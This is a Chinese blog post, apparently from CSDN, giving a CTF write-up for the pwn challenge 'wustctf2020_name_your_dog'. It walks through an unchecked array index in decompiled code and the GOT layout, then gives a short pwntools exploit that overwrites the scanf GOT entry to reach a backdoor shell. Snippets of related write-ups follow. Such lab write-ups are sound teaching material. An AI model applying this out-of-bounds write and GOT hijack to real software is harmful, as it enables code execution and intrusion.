wustctf2020_name_your_dog

最新推荐文章于 2024-07-12 19:48:55 发布
最新推荐文章于 2024-07-12 19:48:55 发布
阅读量69 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132484945
版权

wustctf2020_name_your_dog

数组越界

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

32位,没开pie,可改got表

vulnerable

int vulnerable()
{
  int result; // eax
  int i; // [esp+8h] [ebp-10h]
  int v2; // [esp+Ch] [ebp-Ch]

  result = puts("I bought you five male dogs.Name for them?");
  for ( i = 1; i <= 5; ++i )
  {
    v2 = NameWhich(&Dogs);
    printf("You get %d dogs!!!!!!\nWhatever , the author prefers cats ^.^\n", i);
    result = printf("His name is:%s\n\n", (const char *)(8 * v2 + 134520928));
  }
  return result;
}

Dogs是bss段的

NameWhich

int __cdecl NameWhich(int a1)
{
  int v2[4]; // [esp+18h] [ebp-10h] BYREF

  v2[1] = __readgsdword(0x14u);
  printf("Name for which?\n>");
  __isoc99_scanf("%d", v2);
  printf("Give your name plz: ");
  __isoc99_scanf("%7s", 8 * v2[0] + a1);
  return v2[0];
}

v2没有检查数组边界所以任意我们输入

然后看

.bss:0804A060 ??                            Dogs db    ? ;                          
.bss:0804A061 ??                            db    ? ;
.bss:0804A062 ??                            db    ? ;
.bss:0804A063 ??                            db    ? ;
.bss:0804A064 ??                            db    ? ;
.bss:0804A065 ??                            db    ? ;

.got.plt:0804A00C 8C A0 04 08                   off_804A00C dd offset printf            
.got.plt:0804A010 90 A0 04 08                   off_804A010 dd offset alarm             
.got.plt:0804A014 94 A0 04 08                   off_804A014 dd offset __stack_chk_fail 
.got.plt:0804A018 98 A0 04 08                   off_804A018 dd offset puts              
.got.plt:0804A01C 9C A0 04 08                   off_804A01C dd offset system            
.got.plt:0804A020 A0 A0 04 08                   off_804A020 dd offset __libc_start_main 
.got.plt:0804A024 A4 A0 04 08                   off_804A024 dd offset setvbuf           
.got.plt:0804A028 A8 A0 04 08                   off_804A028 dd offset __isoc99_scanf

先看对齐,我们可以改printf,scanf,

因为他是8的倍数,所以只能选择scanf

from pwn import*
from Yapack import *

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",29285,"./pwn",10)
#-7=(0x28-0x60)/8
sla(b'which?\n>',b'-7')
sla(b'plz: ',p32(0x80485D4))

ia()

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF-PWN刷题记录-19
weixin_44145820的博客
05-09 463
目录wustctf2020_name_your_catwustctf2020_name_your_dog wustctf2020_name_your_cat 在NameWhich函数中没有越界检查 我们调试看一下 0xffd31214就是char v3[40]的地址 而在0xffd3124c处就存放着函数返回地址 0xffd3124c-0xffd31214=0x38 0x38/8=7 所以我们name 7 就能修改这个返回地址了 Exp: from pwn import * r = remote
Django模板获取field的verbose_name实例
09-16
在Django框架中,verbose_name是一个重要的属性,主要用于提供模型字段的可读性名称。它在代码中通常用于替代硬编码的字符串,以提高代码的可维护性和国际化支持。当我们在模型定义中为字段指定verbose_name时,...
wustctf2020_name_your_dog(数组越界劫持got)
m0_51251108的博客
11-05 248
wustctf2020_name_your_dog: 有一道类似的叫name_your_cat,是数组越界 逆向分析: 主界面 NameWhich函数: 根本没检查边界,num我们随便取,依旧数组越界 后门 具体步骤: got表可写,got表就在dog上面不远处,我们能改__isoc99_scanf,printf printf=0x0804A00C __isoc99_scanf=0x0804A028 dog=0x804a060 由于与print相差不是8的倍数,我们选scanf num填(0x28
BUUCTF之“wustctf2020_name_your_dog
Probeginner的博客
12-22 173
利用两次输入覆盖got.plt表间接执行后门函数
[BUUCTF-pwn]——wustctf2020_name_your_dog
Y_peak的博客
03-10 314
[BUUCTF-pwn]——wustctf2020_name_your_dog 题目地址:https://buuoj.cn/challenges#wustctf2020_name_your_dog checksec看下, 在IDA中看下, 竟然有后门函数,我们只需要执行该函数就好 看完代码发现, 没有什么可以溢出的地方. 唯一可以找到修改一些东西的只有, 这个函数, %7s虽然限定了长度但是足够写进去一个地址了. 看一下它的上一级, 调用发现Dogs在bss段距离got表很近, 意味着我们可以修改
mrctf2020_shellcode_revenge|wustctf2020_name_your_cat|2018_gettingStart|SUCTF_2018_stack|wustctf2020
weixin_46521144的博客
04-05 381
这五道题都异常简单。。。也不知道为啥 wustctf2020_number_game 这题大概是csapp第二章学好了直接连就可以了。 v1=Tmin=-2147483648即可。因为32位有符号整数下Tmin是1000_0000_0000_0000,取反码加上1还是Tmin 2018_gettingStart 好吧,这道题还是CSAPP第二章知识直接运用。有一个简单的溢出覆盖,其实是考察浮点的位表示,写个c程序跑一下就出来了 #include<stdio.h> int .
[BUUCTF]PWN——wustctf2020_name_your_dog(越界修改got表)
mcmuyanga的博客
03-18 458
wustctf2020_name_your_dog 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,检索字符的时候发现了后门函数,shell_addr=0x80485cb 主要函数,感觉跟cat那题差不多 漏洞函数 ...
BUUCTF pwn wp 101 - 105
fa1c4的blog
03-03 333
wustctf2020_number_game ciscn_2019_final_2 wustctf2020_easyfast 做过了 https://blog.csdn.net/qq_33976344/article/details/120132888 starctf_2019_babyshell wustctf2020_name_your_dog
BUUCTF-pwn(13)
njh18790816639的博客
01-17 594
wustctf2020_number_game 此时运用我们的计算机底层的知识,可知,计算机底层储存形式为补码! -2147483648的补码形式为0x80000000,它取反加一之后仍然是0x80000000,因此这边输入-2147483648 护网杯_2018_gettingstart 此时又要用到我们的数学知识! 转换浮点数工具 from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './2
持续更新 BUUCTF——PWN(三)
weixin_41748164的博客
03-04 862
这只是个人笔记,buuctf的刷题的第三篇,欢迎一起讨论重新搭建一个合适pwn环境:https://blog.csdn.net/weixin_41748164/article/details/127874334buuctf的前两页:https://blog.csdn.net/weixin_41748164/article/details/126325515。
HTTP_HOST 和 SERVER_NAME 的区别详解
10-31
而 SERVER_NAME 则是另一个Server Variable,它也存储了当前请求的主机名,但是,它的值取决于Web服务器的配置。在Windows 2000下,SERVER_NAME 等于 HTTP_HOST,但是在Windows 2003下,SERVER_NAME 等于 Request....
Python的Flask框架中SERVER_NAME域名项的配置教程
09-21
SERVER_NAME项在Flask的路由配置中至关重要,特别是在配置绝对url和子域名的操作中,这里我们就来看一下Python的Flask框架中SERVER_NAME项的配置教程:
x_name.rar_We Two
09-21
For the Name type we need a SEQUENCE OF { SET OF X509_NAME_ENTRY so declare two template wrappers for this.
Python关于__name__属性的含义和作用详解
09-17
在本篇文章里小编给大家分享的是关于Python关于__name__属性的含义和作用知识点,需要的朋友们可以参考下。
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 251
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 545
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
最新发布
weixin_69863399的博客
07-12 187
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 420
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
DB_NAME="your_database_name"
05-05
将 "your_database_name" 替换为您实际使用的数据库名称。在 Django 项目的 settings.py 文件中,您可以使用以下代码读取该环境变量并将其分配给 DATABASES 中的 NAME 字段: ``` import os DATABASES = { '...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值